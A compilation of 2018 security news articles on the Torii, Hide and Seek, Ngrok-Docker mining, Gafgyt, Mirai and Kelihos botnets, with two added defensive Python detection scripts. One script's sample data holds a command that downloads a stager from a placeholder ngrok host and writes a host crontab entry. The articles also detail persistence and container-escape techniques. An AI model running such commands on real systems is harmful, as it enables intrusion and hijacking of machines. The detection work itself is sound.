- BotNet -

Last update 23.09.2017 19:27:30

Torii botnet, probably the most sophisticated IoT botnet ever
30.9.2018 securityaffairs
BotNet

Avast spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealthy than the numerous Mirai variants previously analyzed.
Security researchers spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealthy than the numerous Mirai variants previously analyzed.

According to experts from Avast, the Torii bot has been active since at least December 2017, and it can target a broad range of architectures, including ARM, MIPS, x86, x64, PowerPC, and SuperH.

The Torii IoT botnet stands out for the unusually large set of architectures it is able to target.

“Over the past week, we have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses.” reads the analysis published by Avast.

“Unlike the aforementioned IoT botnets, this one tries to be more stealthy and persistent once the device is compromised, and it does not (yet) do the usual stuff a botnet does like DDOS, attacking all the devices connected to the internet, or, of course, mining cryptocurrencies.”

According to the experts, the Torii botnet is being used for stealing data from compromised IoT devices. The bot exfiltrates various data from compromised devices, including the hostname and process ID.

The malicious code has a modular structure that is capable of fetching and executing other commands and executables; it leverages multiple layers of encrypted communication to avoid detection.

Another peculiarity of the Torii botnet is that it implements more than six ways to achieve persistence on the infected devices.

“Afterwards, the dropper makes sure that the second stage payload is executed and that it will remain persistent. It is unique in that it is remarkably thorough in how it achieves persistence.” continues the analysis.

“It uses at least six methods to make sure the file remains on the device and always runs. And, not just one method is executed – it runs all of them.

Automatic execution via injected code into ~/.bashrc
Automatic execution via “@reboot” clause in crontab
Automatic execution as a “System Daemon” service via systemd
Automatic execution via /etc/init and PATH. Once again, it calls itself “System Daemon”
Automatic execution via modification of the SELinux Policy Management
Automatic execution via /etc/inittab”

Torii infects devices with Telnet exposed and protected by weak credentials; it first executes a sophisticated script used to determine the architecture of the target.

The script then downloads the first-stage payload that acts as a dropper for the second-stage payload.

Experts said that the bot component communicates with the CnC through active polling in an endless loop, waiting for commands to execute. Once a command has been executed, the bot replies with the results of its execution.

The samples analyzed by the experts were communicating with a command-and-control server located in Arizona.

At the time of the analysis, Telnet was the only vector used by the bot to compromise other devices.

According to BleepingComputer, the malicious code was also analyzed by the Italian cyber security expert Marco Ramilli, who noticed similarities to the Persirai worm.

Vess
@VessOnSecurity
· Sep 20, 2018
My honeypot just caught something substantially new. Spreads via Telnet but not your run-of-the-mill Mirai variant or Monero miner...

First stage is just a few commands that download a rather sophisticated shell script, disguised as a CSS file. (URL is still live.) pic.twitter.com/r5L0I8PC0h

Marco Ramilli
@Marco_Ramilli
Just reversed, it looks like a known Persirai worm. Following the core: $x5 = “npxXoudifFeEgGaACScs”. Anyway thanks for sharing it @VessOnSecurity It has been fun ! pic.twitter.com/BrQzdfMFVB

10:44 AM - Sep 27, 2018
“Even though our investigation is continuing, it is clear that Torii is an example of the evolution of IoT malware, and that its sophistication is a level above anything we have seen before.” concludes the analysis.

“Once it infects a device, not only does it send quite a lot of information about the machine it resides on to the CnC, but by communicating with the CnC, it allows Torii authors to execute any code or deliver any payload to the infected device. This suggests that Torii could become a modular platform for future use.”

Further details, including IoCs, are reported in the analysis published by Avast.


Meet Torii, a Stealthy, Versatile and Highly Persistent IoT Botnet
28.9.2018 securityweek
BotNet  IoT

There’s a new Internet of Things (IoT) botnet lurking around, a stealthy one that attempts to achieve persistence by running six different routines at once, Avast has discovered.

Dubbed Torii, because some of the hits to a honeypot were observed coming from Tor exit nodes, the botnet targets multiple architectures, but doesn’t appear to include the usual set of malicious capabilities that IoT botnets are famous for, such as distributed denial of service (DDoS), spam, or crypto-mining.

It does, however, pack a rich set of information exfiltration features, as well as a modular architecture that allows it to fetch and execute commands and files, all via multiple layers of encrypted communication.

Active since at least December 2017, Torii can infect devices powered by MIPS, ARM, x86, x64, PowerPC, SuperH, Motorola 68k, and others, Avast has discovered. The malware targets weak credentials over the Telnet protocol and, after the initial compromise, it executes a shell script to determine the device’s architecture and download the appropriate payload, either over HTTP or FTP.

The script fetches a binary file that represents a dropper for the second-stage payload, and which attempts to make it persistent using multiple methods. The second-stage is contained within the first ELF file and is installed to a pseudo-random location.

After executing the payload, the dropper executes six different methods for persistence: via injected code into ~/.bashrc, via “@reboot” clause in crontab, as a “System Daemon” service via systemd, via /etc/init and PATH (it calls itself System Daemon), via modification of the SELinux Policy Management, and via /etc/inittab.
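
As an added example (not Avast's or either article's code), the following script audits a Linux root tree for the six persistence locations listed in both write-ups, so a device or a mounted firmware image can be checked for the same footholds. The scratch-path heuristic, the directory list and the sample tree it builds are assumptions made for the demo.

```python
"""Audit a Linux root tree for the six Torii persistence mechanisms.

Added example, not Avast's or the articles' code. It walks a root prefix
(a mounted firmware image, or "/" on a live device) and reports signs of
each mechanism named in the analysis. The "System Daemon" string comes from
the article; the suspect-path heuristic and the sample tree are constructed.
"""
import os
import re
import tempfile

SUSPECT_NAME = "System Daemon"                              # name the dropper uses (from the analysis)
SUSPECT_PATH = re.compile(r"/(tmp|var/tmp|dev/shm)/\S+")     # assumed: scratch dirs where droppers land


def _text(path):
    """Return file contents, or "" if the file is missing or unreadable."""
    try:
        with open(path, errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def _files_under(d):
    """Regular files directly inside directory d (empty list if it does not exist)."""
    try:
        return [os.path.join(d, n) for n in sorted(os.listdir(d))
                if os.path.isfile(os.path.join(d, n))]
    except OSError:
        return []


def audit_persistence(root="/"):
    """Return a list of (method, path, evidence) tuples; an empty list means nothing matched."""
    j = lambda *p: os.path.join(root, *p)
    findings = []

    # 1. ~/.bashrc: an injected line launching something from a scratch directory
    users = os.listdir(j("home")) if os.path.isdir(j("home")) else []
    for home in [j("root")] + [j("home", u) for u in users]:
        rc = os.path.join(home, ".bashrc")
        for line in _text(rc).splitlines():
            if SUSPECT_PATH.search(line) or SUSPECT_NAME in line:
                findings.append(("bashrc", rc, line.strip()))

    # 2. crontab: any @reboot clause in the system crontab, cron.d or per-user spools
    cron_files = [j("etc", "crontab")] + _files_under(j("etc", "cron.d")) \
        + _files_under(j("var", "spool", "cron", "crontabs")) + _files_under(j("var", "spool", "cron"))
    for f in cron_files:
        for line in _text(f).splitlines():
            if line.lstrip().startswith("@reboot"):
                findings.append(("crontab", f, line.strip()))

    # 3. systemd: a unit that names itself "System Daemon"
    for d in (j("etc", "systemd", "system"), j("lib", "systemd", "system"), j("usr", "lib", "systemd", "system")):
        for f in _files_under(d):
            if SUSPECT_NAME in _text(f) or "system-daemon" in os.path.basename(f).lower():
                findings.append(("systemd", f, "unit names itself '%s'" % SUSPECT_NAME))

    # 4. /etc/init (and init.d): a script carrying the same name or pointing at a scratch path
    for d in (j("etc", "init"), j("etc", "init.d")):
        for f in _files_under(d):
            body = _text(f)
            if SUSPECT_NAME in body or SUSPECT_PATH.search(body):
                findings.append(("init", f, "script references '%s' or a scratch path" % SUSPECT_NAME))

    # 5. SELinux: locally added policy modules (assumed indicator of policy tampering)
    for dirpath, _, names in os.walk(j("etc", "selinux")):
        for n in names:
            p = os.path.join(dirpath, n)
            if n.endswith((".pp", ".te", ".cil")) or SUSPECT_NAME in _text(p):
                findings.append(("selinux", p, "local policy module present"))

    # 6. /etc/inittab: a respawn/sysinit/once/boot entry that runs a scratch-path binary
    for line in _text(j("etc", "inittab")).splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and fields[2] in ("respawn", "sysinit", "once", "boot") \
                and SUSPECT_PATH.search(fields[3]):
            findings.append(("inittab", j("etc", "inittab"), line.strip()))
    return findings


def build_sample_root():
    """Create a constructed root tree exhibiting four of the six mechanisms; returns its path."""
    root = tempfile.mkdtemp(prefix="torii-audit-")
    files = {
        "root/.bashrc": "alias ll='ls -l'\n/var/tmp/.sd/system >/dev/null 2>&1 &\n",  # constructed injection
        "home/pi/.bashrc": "export PATH=$PATH:~/bin\n",                               # clean, must not be flagged
        "etc/crontab": "SHELL=/bin/sh\n@reboot root /var/tmp/.sd/system\n",           # constructed @reboot entry
        "etc/systemd/system/sd.service": "[Unit]\nDescription=System Daemon\n[Service]\nExecStart=/var/tmp/.sd/system\n",
        "etc/inittab": "id:3:initdefault:\nsd:2345:respawn:/var/tmp/.sd/system\n",
    }
    for rel, body in files.items():
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for method, path, evidence in audit_persistence(build_sample_root()):
        print("[%-8s] %s: %s" % (method, path, evidence))
```

Run it against a real device with `audit_persistence("/")`, or against an unpacked firmware image by passing its extraction directory.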

A full-fledged bot, the second-stage is capable of executing commands from the command and control (C&C) server. The malware also includes simple anti-debugging techniques, data exfiltration, multi-level encryption of communication, and other capabilities.

With many of the functions in the second stage also found in the dropper, Avast’s security researchers suggest that they were both built by the same developer. However, while the code in the dropper is almost identical for all architectures, the second stage binaries show differences based on the targeted hardware architectures.

The malware uses the simple anti-analysis method of a 60-second sleep after execution and attempts to randomize the process name to avoid detection of blacklisted process names. The author also stripped the symbols from the executables to make analysis more difficult.

The C&C address is encrypted using a XOR-based cipher and each Torii variant contains 3 addresses, Avast discovered. Since September 15, the domain names have resolved to IP 66.85.157.90, which also hosts other suspicious domains, the security researchers say. Communication with the C&C server is done via TCP port 443.

When connecting to the server, Torii exfiltrates information such as hostname, process ID, path to second stage executable, all MAC addresses in /sys/class/net/%interface_name%/address and its MD5 hash, data found by uname() call (sysname, version, release, and machine), and the outputs of various commands that gather additional information from the compromised machines.

The malware continuously asks the server if there are any commands it should execute, the security researchers discovered. After receiving a command, the threat replies with the results of the execution.

Another binary found on the attackers’ FTP server, sm_packed_agent, contains functionality that could be used to send any remote command to the target device. Written in the Go language, it could be easily recompiled to run on virtually any architecture and could serve as a backdoor or as a service to orchestrate multiple machines, the researchers say.

“Even though our investigation is continuing, it is clear that Torii is an example of the evolution of IoT malware, and that its sophistication is a level above anything we have seen before. Once it infects a device, not only does it send quite a lot of information about the machine it resides on to the C&C, but by communicating with the C&C, it allows Torii authors to execute any code or deliver any payload to the infected device. This suggests that Torii could become a modular platform for future use,” Avast concludes.


Hide and Seek (HNS) IoT Botnet targets Android devices with ADB option enabled
27.9.2018 securityaffairs 
BotNet  IoT

The latest samples of the HNS bot were designed to target Android devices having the wireless debugging feature ADB enabled.
The Hide and Seek (HNS) IoT botnet was first spotted early this year, and since its discovery its authors have continuously evolved its code.

The IoT botnet appeared in the threat landscape in January, when it was first discovered on January 10th by malware researchers from Bitdefender; it then disappeared for a few days and reappeared a few weeks later, infecting more than 20,000 devices within a few days.

The botnet initially spread by infecting unsecured IoT devices, mainly IP cameras; in July, security experts from Fortinet discovered that the Hide ‘N Seek botnet had been improved to target vulnerabilities in home automation systems.

In the same month, experts from Netlab observed the Hide ‘N Seek botnet targeting cross-platform database solutions as well. It was the first IoT malware to implement a persistence mechanism that keeps devices infected after reboots.

The latest samples of the HNS bot were designed to target Android devices having the wireless debugging feature enabled instead of exploiting known vulnerabilities.

By default, Android ships with the Android Debug Bridge (ADB) option disabled, but vendors often enable it to customize the operating system and then ship devices with the feature turned on.

The authors of the HNS botnet are attempting to compromise new devices by abusing this feature.

“The newly identified samples add functionality by exploiting the Android Debug Bridge (ADB) over Wi-Fi feature in Android devices, which developers normally use for troubleshooting.” reads the analysis published by BitDefender.

“While it’s traditionally disabled by default, some Android devices are shipped with it enabled, practically exposing users to remote connections via the ADB interface that’s accessible using the TCP port 5555. Any remote connection to the device is performed unauthenticated and allows for shell access, practically enabling attackers to perform any task in administrator mode.”

In February 2018, security researchers at Qihoo 360’s Netlab spotted an Android mining botnet that was targeting devices with the ADB interface open.

The recent improvement of the Hide and Seek botnet allowed its operators to add 40,000 new devices, most of them in Taiwan, Korea, and China.

Experts pointed out that the HNS bot could infect any device that has ADB over Wi-Fi enabled, including smart TVs and DVRs.

“It’s safe to say that not just Android-running smartphones are affected — smart TVs, DVRs and practically any other device that has ADB over Wi-Fi enabled could be affected too.” concludes Bitdefender.

“Considering the evidence at hand, we speculate the botnet operators are constantly adding new features to “enslave” as many devices as possible, although the true purpose of the botnet remains unknown.”


Ngrok Mining Botnet
23.9.2018 securityaffairs
BotNet

The Ngrok campaign is unique in terms of its overall sophistication for a Docker-based attack vector.
Specifically, it demonstrates a novel, dynamic and robust operational security model and the ability to detect and attack newly deployed and misconfigured infrastructure.

Additionally, the campaign is sophisticated in seeking to detect, analyse and neutralise other competing crypto-mining malware. Its agile process can be flexed to quickly deal with new entrant-attacks and ensure a full share of the victim’s CPU resources for its activities.

Introduction
In my previous post I discussed the initial prototyping of a Docker Honeypot / Sandbox called Whaler. I’ve now been running this for a few months and tracking the number of campaigns with a range of sophistication. The most sophisticated of these was the first attack observed within hours of the initial deployment. I named the campaign Ngrok after the inventive reverse proxy used to hide the C2 infrastructure.

I’ve been following the Monero mining pool address used in the Ngrok campaign and regularly checking for other research references on the internet. The campaign has gone largely unnoticed until a recent blog published by 360totalsecurity which prompted me to finally write-up the analysis. As of today (20 Sept) the campaign is still active.

Note: I’d previously documented this as a presentation which I’ve been using in job interviews – key slides are extracted and covered below.

Whaler – attack types and analysis
Before getting into the details of the Ngrok campaign, it’s worth summarising the key findings from the first few months of operations and development. Firstly, nearly all attacks observed were crypto-mining attacks. One exception appeared to attempt to stage a meterpreter payload to the server, but I was unable to follow up in time on this and the attacker did not repeat the attack.

Most attackers seem to rely on discovery and indexing by Shodan as a source for their target list. There’s a clear correlation between the honeypot first appearing on Shodan and an immediate wave of attacks.

The attacks broadly fall into three levels of sophistication:

Low Complexity – Simply pulling a pre-baked mining image from Docker Hub and running it with parameterisation for the attacker’s mining pool / account
Medium Complexity – Again using Docker Hub, but creating their own container images, often with misleading names (e.g. mysql) but essentially containing a fully configured crypto-miner. Several of these were reported and shut down quickly working with the Docker security team. Other malware, such as an IRC botnet, was also observed bundled with the miner software.
High Complexity – These attackers either ran their own target scanning operations, or leveraged their botnets to do this work for them. They were therefore able to detect and attack victims much quicker. Some of these attacks used the volume mounting feature of the Docker Daemon to execute a container escape – and therefore could install their payloads on the “host” system – invisible to Docker and any monitoring of running containers.

First Attack

Attack timing for Ngrok campaign

The first attack was observed within a few hours of deploying the initial Whaler prototype. The attack was occurring approximately every 2 hours in a continuous cycle – which indicates the attack is automated.

Pcap analysis of Ngrok attack
The user agent string confirms this is likely automated, and the attacker is using an open-source, lightweight Ruby-based Docker API client framework from Swipely.

The attacking IP address is consistently hidden behind a VPN service.

Exploit

Whaler “Fingerprint” for Ngrok attack
Whaler was enhanced to provide a “fingerprint” of each attack. This is used to determine how much of the attack data (Docker images, containers, pcap files etc) to retain, based on the probability this attack has already been seen. Automated attacks can drive a large amount of data storage requirements if this isn’t managed carefully!

The attack fingerprint for Ngrok is shown above. Key features are:

The attacker uses a public alpine docker image, pre-installed with curl. There is nothing malicious about this publicly available container
The container is parameterised to use curl to download and run a staging script from a ngrok reverse proxy address – thus hiding the backend C2 infrastructure
Note: The ngrok.io subdomains are rotated through a set of 52 which are replaced every 8 hours
Each victim has a unique hash identifier to identify their IP – this is used for reporting back to the C2 on details of the host and infection status
The container mounts the root file system of the host and creates a crontab entry to execute the stager script outside of Docker – this is a classic Docker container escape
There is a parameter to identify that the stager for Docker (d) should be downloaded – the attacker has a broader target scope including other misconfigured products as discussed later

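
As an added example (not part of Whaler or the original post), here is a check a defender can run over `docker inspect` output to flag the container pattern this fingerprint describes: the host root filesystem bound into the container, a curl/wget fetch from an ngrok.io address, and a cron entry written from inside the container. The inspect records are constructed, and the ngrok subdomain in them is a placeholder.

```python
"""Flag containers matching the Ngrok campaign fingerprint in `docker inspect` output.

Added example, not part of Whaler or the original post. It parses the JSON
array that `docker inspect <container...>` prints and reports the traits the
fingerprint describes. The sample records below are constructed.
"""
import json
import re

PROXY_DOMAINS = ("ngrok.io",)                          # reverse proxy used to hide the C2 (from the post)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")  # host part of any URL in the command line
FETCH_RE = re.compile(r"\b(curl|wget)\b")
CRON_RE = re.compile(r"crontab\b|/etc/cron|/var/spool/cron")


def container_command(record):
    """Entrypoint plus Cmd, joined into one string for pattern matching."""
    cfg = record.get("Config") or {}
    return " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))


def host_root_mounts(record):
    """Container paths at which the host's "/" is bind-mounted (deduplicated, sorted)."""
    dests = set()
    for b in (record.get("HostConfig") or {}).get("Binds") or []:
        parts = b.split(":")                      # "/host/path:/container/path[:opts]"
        if parts[0] == "/" and len(parts) > 1:
            dests.add(parts[1])
    for m in record.get("Mounts") or []:
        if m.get("Type") == "bind" and m.get("Source") == "/":
            dests.add(m.get("Destination", "?"))
    return sorted(dests)


def flag_container(record):
    """Return the list of reasons this container matches the fingerprint (empty if clean)."""
    reasons = []
    cmd = container_command(record)
    roots = host_root_mounts(record)
    if roots:
        reasons.append("host root bind-mounted into the container at " + ", ".join(roots))
    hosts = URL_HOST_RE.findall(cmd)
    if FETCH_RE.search(cmd) and any(h.endswith(d) for h in hosts for d in PROXY_DOMAINS):
        reasons.append("command downloads from a reverse-proxy host: " + ", ".join(hosts))
    if CRON_RE.search(cmd):
        reasons.append("command writes a cron entry (persistence outside the container)")
    if (record.get("HostConfig") or {}).get("Privileged"):
        reasons.append("container is privileged")
    return reasons


def scan_inspect_output(text):
    """Parse `docker inspect` JSON and map each flagged container name to its reasons."""
    flagged = {}
    for rec in json.loads(text):
        reasons = flag_container(rec)
        if reasons:
            flagged[rec.get("Name") or rec.get("Id", "?")] = reasons
    return flagged


# Constructed sample: one record mirroring the fingerprint, one ordinary web container.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "aaa111", "Name": "/nostalgic_turing",
        "Config": {"Image": "alpine-with-curl-placeholder", "Entrypoint": None,
                   "Cmd": ["sh", "-c", "curl -s http://PLACEHOLDER.ngrok.io/d -o /mnt/tmp/d && "
                                       "echo '* * * * * sh /tmp/d' >> /mnt/etc/crontab"]},
        "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False},
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt"}],
    },
    {
        "Id": "bbb222", "Name": "/web",
        "Config": {"Image": "nginx:1.15", "Entrypoint": None, "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False},
        "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/usr/share/nginx/html"}],
    },
])

if __name__ == "__main__":
    for name, reasons in scan_inspect_output(SAMPLE_INSPECT).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

On a live host, feed it `docker inspect $(docker ps -aq)`; the same root-bind check is worth running as an admission rule, since a bind of "/" is what turns a reachable Docker API into a host compromise.
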
Stage 1 – Loader
The loader script, once running on the host system (outside of Docker), performs the following actions.

Enumerate all processes and immediately kill any that meet a pre-defined kill list (other mining processes)
Install the miner for the attacker by downloading two further binaries
Report back to the C2 server (via ngrok) on the following:
Process ID of the infection by this attack
Number of CPUs
Current Username
Process name, binary location and MD5 sum of binary of anything currently running above 20% CPU

The last data point reported here enables the attacker to identify new mining campaigns and adjust their script to also target termination of those processes where found.

During the course of the analysis it was also noted that additional code was added to search for and inject Coinhive mining code into any JavaScript files found on the server. If these are then served via a web server it would result in further browser-based mining on behalf of the attacker.

Stage 2 – Scanner
Once the installation has been successfully completed and the infection has been reported back to the C2 infrastructure, a second script is delivered using the same mechanism as before (container escape -> cron job).

This second stage is used to enlist the victim to mass-scan a large section of IPv4 space looking for further victims. The script downloads ZMap, ZGrab and jq and performs a scan of a pre-defined series of 8K blocks of the internet looking for:

Redis on port 6379
Docker on port 2375
Jenkins, Drupal and Modx on ports 80 and 8080
CouchDB on 5984
Ethereum on 8545

Results are reported back to the C2, and hence the cycle repeats.

Overview of Attacker Infrastructure

An overview of the Ngrok infrastructure is shown above.

Hash Rate & Payment History
Ngrok account hash rate over time
The deployed miner was configured to use the minexmr pool, and the wallet id used is:

4AuKPF4vUMcZZywWdrixuAZxaRFt9FPNgcv9v8vBnCtcPkHPxuGqacfPrLeAQWKZpNGTJzxKuKgTCa6LghSCDrEyJ5s7dnW

Using this we can see that this account was first used in early April, with approximate hashing capacity of 30-40k/s and there was a significant increase in capacity in early June, peaking at 90k/s. This uplift correlates with 360totalsecurity’s observation that the attacks “started in June” – perhaps indicating an additional target infrastructure that triggered their honeypots.

For reference, benchmarking the miner on a 1 CPU cloud server, the peak mining capacity here would be in the region of 2000 virtual CPUs.

Ngrok cumulative profit
The campaign has produced a steady, but relatively low, stream of income. It is possible that other accounts are used – in fact we also have the Coinhive account, for which we are unable to determine the hashing rate or any payment details.

Between April and late August the attackers had made approx £5000 GBP.

Further details, including IoCs, are available at the following URL:

Ngrok Mining Botnet


Mirai Authors Avoid Prison After Working With FBI
20.9.2018 securityweek
BotNet

Three individuals who last year admitted creating and using the notorious Mirai botnet have avoided prison after helping the FBI in other cybercrime investigations, the U.S. Department of Justice announced on Tuesday.

Josiah White, 21, of Washington, Pennsylvania; Paras Jha, 22, of Fanwood, New Jersey; and Dalton Norman, 22, of Metairie, Louisiana, pleaded guilty in December 2017 to criminal informations in relation to Mirai and what authorities call the “Clickfraud” botnet.

The Justice Department said on Tuesday that each of the men was sentenced to five years of probation and 2,500 hours of community service. They have also been ordered to pay $127,000 in restitution, and they have voluntarily handed over significant amounts of cryptocurrency seized during the investigation into their activities.

Jha, White, and Norman are said to have “cooperated extensively” with the FBI on complex cybercrime investigations before their sentencing and they will continue doing so. They must also cooperate with law enforcement and the broader research community.

The Mirai botnet ensnared hundreds of thousands of IoT devices, allowing cybercriminals to launch powerful distributed denial-of-service (DDoS) attacks and conduct click fraud. Authorities said the three earned roughly $180,000 through their click fraud scheme.

Jha, a former Rutgers University computer science student, admitted writing the Mirai code and setting up the command and control (C&C) infrastructure.

The Mirai botnet attacks were investigated by the FBI’s Field Office in Anchorage, Alaska, and the cybercriminals were sentenced by the Chief U.S. District Judge in Alaska.

“Cybercrime is a worldwide epidemic that reaches many Alaskans,” said Bryan Schroder, the U.S. Attorney for the District of Alaska. “The perpetrators count on being technologically one step ahead of law enforcement officials. The plea agreement with the young offenders in this case was a unique opportunity for law enforcement officers, and will give FBI investigators the knowledge and tools they need to stay ahead of cyber criminals around the world.”

The conviction of Jha, White, and Norman is the result of cooperation between government agencies in the US, UK, Northern Ireland, and France, and private-sector companies such as Palo Alto Networks, Google, Cloudflare, Coinbase, Flashpoint, Oath, Qihoo 360 and Akamai.

Security blogger Brian Krebs correctly identified Jha and White as authors of Mirai in January 2017.


Dissecting the first Gafgyt bot implementing the “Non Un-Packable” NUP technique
19.9.2018 securityaffairs
BotNet

Experts at the CSE Cybsec Z-Lab have found a Gafgyt variant implementing the “Non Un-Packable” technique recently presented at a cyber security conference.
A new variant of the Gafgyt botnet has been spreading in the last few hours, and experts of the CSE Cybsec Z-Lab have found it with the support of the Italian cyber security experts @Odisseus and GranetMan.

The new variant analyzed in the report published by the experts was found on a system resolving the IP address owned by the Italian ISP Aruba. This specific version implements some advanced packing techniques that make the static analysis much harder.

We downloaded the samples directly from the compromised server; we found four samples of the Gafgyt variant, already compiled for specific architectures: x86-64, x86-32, MIPS and ARM.

The sample shows the same behavior associated with the classic Gafgyt botnet but we immediately noticed a distinctive feature, the implementation of “Non Un-Packable” NUP technique.

Malware Must Die leader @unixfreaxjp presented the sophisticated technique at the recent Radare conference (r2con2018) in his talk about the “Non Un-Packable” packer.

According to the experts, the “Non Un-Packable” ELF had been around for a few months before the talk, and our discovery confirms that malware developers have started adopting it.

The report includes a detailed analysis of the malware.


Mirai authors avoid the jail by helping US authorities in other investigations
19.9.2018 securityaffairs
BotNet

Three men who admitted to being the authors of the Mirai botnet avoided the jail after helping the FBI in other cybercrime investigations.
I’ve been following the evolution of the Mirai botnet since MalwareMustDie shared with me the findings of its investigation in August 2016.

Now three individuals who admitted to being the authors of the infamous botnet have avoided jail after helping the feds in other cybercrime investigations.

The three men, Josiah White (21) of Washington, Pennsylvania; Paras Jha (22), of Fanwood, New Jersey, and Dalton Norman (22), of Metairie, Louisiana, pleaded guilty in December 2017 to developing and running the dreaded Mirai botnet that was involved in several massive DDoS attacks.

The identification and conviction of the three men is the result of an international joint cooperation between government agencies in the US, UK, Northern Ireland, and France, and private firms, including Palo Alto Networks, Google, Cloudflare, Coinbase, Flashpoint, Oath, Qihoo 360 and Akamai.

According to the plea agreements, White developed the Telnet scanner component used by Mirai, Jha created the botnet’s core infrastructure and the malware’s remote control features, while Norman developed new exploits.

Jha, who goes online by the moniker “Anna-senpai,” leaked the source code for the Mirai malware on a criminal forum, allowing other threat actors to use it and making attribution of the attacks hard.

Jha also pleaded guilty to carrying out multiple DDoS attacks against his alma mater Rutgers University between November 2014 and September 2016, before creating the Mirai botnet. According to the authorities, the three earned roughly $180,000 through their click fraud scheme.

The Mirai case was investigated by the FBI Field Office in Anchorage, and the Chief U.S. District Judge in Alaska sentenced the men.

“U.S. Attorney Bryan Schroder announced today that three defendants have been sentenced for their roles in creating and operating two botnets, which targeted “Internet of Things” (IoT) devices. Paras Jha, 22, of Fanwood, New Jersey; Josiah White, 21, of Washington, Pennsylvania; and Dalton Norman, 22, of Metairie, Louisiana, were sentenced today by Chief U.S. District Judge Timothy M. Burgess.” states the press release published by the DoJ.

“On Dec. 8, 2017, Jha, White, and Norman pleaded guilty to criminal Informations in the District of Alaska charging them each with conspiracy to violate the Computer Fraud & Abuse Act in operating the Mirai Botnet. Jha and Norman also pleaded guilty to two counts each of the same charge, one in relation to the Mirai botnet and the other in relation to the Clickfraud botnet.”

On Tuesday, the DoJ revealed that each of the men was sentenced to five years of probation and 2,500 hours of community service.

The judges required them to repay $127,000, and they have voluntarily handed over huge amounts of cryptocurrency that the authorities seized as part of the investigation on the botnet.

The three men have “cooperated extensively” with the authorities helping the FBI on complex cybercrime investigations before the sentence. The trio will continue to offer their support to the feds.

“After cooperating extensively with the FBI, Jha, White, and Norman were each sentenced to serve a five-year period of probation, 2,500 hours of community service, ordered to pay restitution in the amount of $127,000, and have voluntarily abandoned significant amounts of cryptocurrency seized during the course of the investigation.” continues the press release.

“As part of their sentences, Jha, White, and Norman must continue to cooperate with the FBI on cybercrime and cybersecurity matters, as well as continued cooperation with and assistance to law enforcement and the broader research community.”


Kelihos botmaster pleads guilty in U.S. District Court in Connecticut
14.9.2018 securityaffairs BotNet  Crime

The creator of the infamous Kelihos Botnet, Peter Yuryevich Levashov (38) pleaded guilty this week to computer crime, fraud, conspiracy and identity theft charges.
Peter Yuryevich Levashov (38), the botmaster of the dreaded Kelihos Botnet, pleaded guilty this week to computer crime, fraud, conspiracy and identity theft charges.

In April 2017, the United States Department of Justice announced that Peter Yuryevich Levashov (36) (also known as Petr Levashov, Peter Severa, Petr Severa and Sergey Astakhov) was arrested in Barcelona for his involvement with the infamous Kelihos botnet. Levashov was extradited to the United States in February.

“Peter Yuryevich Levashov, aka “Petr Levashov,” “Peter Severa,” “Petr Severa” and “Sergey Astakhov,” 38, of St. Petersburg, Russia, pleaded guilty today in U.S. District Court in Hartford, Connecticut, to offenses stemming from his operation of the Kelihos botnet, which he used to facilitate malicious activities including harvesting login credentials, distributing bulk spam e-mails, and installing ransomware and other malicious software.” states the press release published by the DoJ.

Levashov on Wednesday pleaded guilty in U.S. District Court in Hartford, Connecticut, to one count of causing intentional damage to a protected computer, one count of conspiracy, one count of aggravated identity theft, and one count of wire fraud.

According to a study conducted by CheckPoint Security, the malware landscape was characterized by some interesting changes in the first part of 2017.

The Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.

Levashov has operated several botnets since the late 1990s; two other botnets, tracked as Storm and Waledac, share code with Kelihos, and both have been attributed to Levashov.

“For over two decades, Peter Levashov operated botnets which enabled him to harvest personal information from infected computers, disseminate spam, and distribute malware used to facilitate multiple scams,” said Assistant Attorney General Benczkowski.

“Mr. Levashov used the Kelihos botnet to distribute thousands of spam e-mails, harvest login credentials, and install malicious software on computers around the world,” said U.S. Attorney Durham. “He also participated in online forums on which stolen identities, credit card information and cybercrime tools were traded and sold. For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users.”

The DoJ speculated Levashov sent spam urging recipients to buy shares as part of a “pump and dump” scam, among other naughtiness.

The Russian hacker was accused of having used the Kelihos botnet for spam campaigns that advertised various criminal schemes, including pump-and-dump stock fraud.

The activity conducted by the Kelihos, Storm and Waledac botnets was very profitable; prosecutors believe it allowed crooks to earn hundreds of millions of dollars.

“For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users,” said U.S. Attorney John H. Durham of the District of Connecticut. “Thanks to the collaborative work of the FBI and our partners in law enforcement, private industry and academia, a prolific cybercriminal has been neutralized, and has now admitted his guilt in a U.S. courtroom.”

Sentencing has been scheduled for September 6, 2019, likely because the man is now helping law enforcement agencies with investigations into other cybercrime operations.


Kelihos Botnet Author Pleads Guilty in U.S. Court
14.9.2018 securityweek BotNet

Peter Yuryevich Levashov, a 38-year-old Russian national accused of operating the notorious Kelihos botnet, pleaded guilty on Wednesday to computer crime, fraud, conspiracy and identity theft charges.

Levashov, aka “Petr Levashov,” “Peter Severa,” “Petr Severa” and “Sergey Astakhov,” is said to have operated several botnets between the late 1990s and April 2017, when he was arrested.

The Storm and Waledac botnets, which share source code with Kelihos, have also been attributed to Levashov. Levashov’s malware had infected hundreds of thousands of computers, allowing him and other cybercriminals who rented the botnets to send spam and steal valuable information from compromised devices. Authorities said the man also took part in operating various cybercrime forums.

The Kelihos, Storm and Waledac botnets reportedly generated hundreds of millions of dollars for cybercriminals. Data leaked in 2010 after hackers broke into the systems of a pharmacy spam program showed that Levashov had made nearly $600,000 from these types of activities over a 3-year period.

